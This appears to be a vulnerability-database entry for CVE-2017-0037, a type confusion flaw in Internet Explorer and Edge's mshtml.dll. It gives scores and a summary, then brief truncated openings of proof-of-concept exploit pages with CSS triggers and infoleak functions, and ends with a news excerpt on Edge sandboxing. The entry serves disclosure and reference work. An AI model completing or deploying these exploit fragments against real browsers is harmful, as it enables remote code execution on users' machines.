CVE-2017-0037

Published: 26/02/2017 Updated: 19/11/2017
CVSS v2 Base Score: 7.6 | Impact Score: 10 | Exploitability Score: 4.9
CVSS v3 Base Score: 8.1 | Impact Score: 5.9 | Exploitability Score: 2.2
VMScore: 775
Vector: AV:N/AC:H/Au:N/C:C/I:C/A:C

Vulnerability Summary

Microsoft Internet Explorer 10 and 11 and Microsoft Edge have a type confusion issue in the Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement function in mshtml.dll, which allows remote malicious users to execute arbitrary code via vectors involving a crafted Cascading Style Sheets (CSS) token sequence and crafted JavaScript code that operates on a TH element.

Vulnerable Product

microsoft edge

microsoft internet explorer 11

Exploits

<!DOCTYPE html> <html> <head> <style> .class1 { float: left; column-count: 5; } .class2 { column-span: all; columns: 1px; } table {border-spacing: 0px;} </style> <script> var ntdllBase = ""; function infoleak() { var textarea = document.getElementById( ...
<!-- Source: bugs.chromium.org/p/project-zero/issues/detail?id=1011 PoC: --> <!-- saved from url=(0014)about:internet --> <style> .class1 { float: left; column-count: 5; } .class2 { column-span: all; columns: 1px; } table {border-spacing: 0px;} </style> <script> function boom() { document.styleSheets[0].med ...
<!DOCTYPE html> <html> <head> <style> .class1 { float: left; column-count: 5; } .class2 { column-span: all; columns: 1px; } table {border-spacing: 0px;} </style> <script> var base_leaked_addr = ""; function infoleak() { var textarea = document.getEleme ...
Microsoft Internet Explorer mshtml.dll remote code execution exploit that leverages the issue noted in MS17-007 ...
Microsoft Edge and Internet Explorer suffer from a type confusion in HandleColumnBreakOnColumnSpanningElement ...

Github Repositories

CVE-2017-0037 (Microsoft Browser Memory Corruption Vulnerability). This document is about CVE-2017-0037 - Microsoft Browser Memory Corruption Vulnerability. It will first introduce what a Remote Code Execution (RCE) is and then go through some technical specifics. What is Remote Code Execution? A cyber-attack in which an attacker may remotely execute commands on another comp

Recent Articles

More fun in the sandbox: Experts praise security improvements to Edge
The Register • John Leyden • 30 Mar 2017

Time will tell if Microsoft's browser is less ez2pwn

Security watchers have reacted positively to recently announced improvements to Microsoft's Edge browser, which had earned an unenviable reputation for easy pwnage. Redmond is reducing its exposure to malicious exploits by improving Edge's sandboxing technology. Further features have been added to existing technologies like ACG (Arbitrary Code Guard) and CIG (Code Integrity Guard) to prevent remote code execution. ACG and CIG are designed to make it harder for hackers to load malicious code in...